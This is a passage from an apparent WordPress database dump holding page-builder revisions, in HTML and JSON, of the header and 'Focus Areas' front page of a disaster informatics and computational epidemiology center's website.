d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n </span><span class=\"h-button__outer style-679-outer style-local-22-h39-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/\" data-colibri-id=\"22-h39\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-679 style-local-22-h39 position-relative\"><!----><!----> <span>Learn more</span></a>\n </span>\n </div>\n </div>\n <div data-colibri-id=\"22-h31\" class=\"h-x-container style-217 style-local-22-h31 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h31-group style-217-spacing style-local-22-h31-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h32-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h32\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h32 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-05-03 13:24:56','2022-05-03 17:24:56','',22,'https://gsudice.dataconn.net/?p=1313',0,'revision','',0),(1317,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',168,'https://gsudice.dataconn.net/?p=1317',0,'revision','',0),(1318,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-334 style-local-20-c8\">\n <!---->\n <!---->\n <h1 class=\"\">Focus Areas</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c12\">\n <!---->\n <!---->\n <h5 class=\"\">disease & disaster modeling</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c16\">\n <!---->\n <!---->\n <h5 class=\"\">data as a service</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n <div\n data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-05-03 13:33:37','2022-05-03 17:33:37','',20,'https://gsudice.dataconn.net/?p=1318',0,'revision','',0),(1319,1,'2022-05-03 13:33:37','2022-05-03 17:33:37','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & 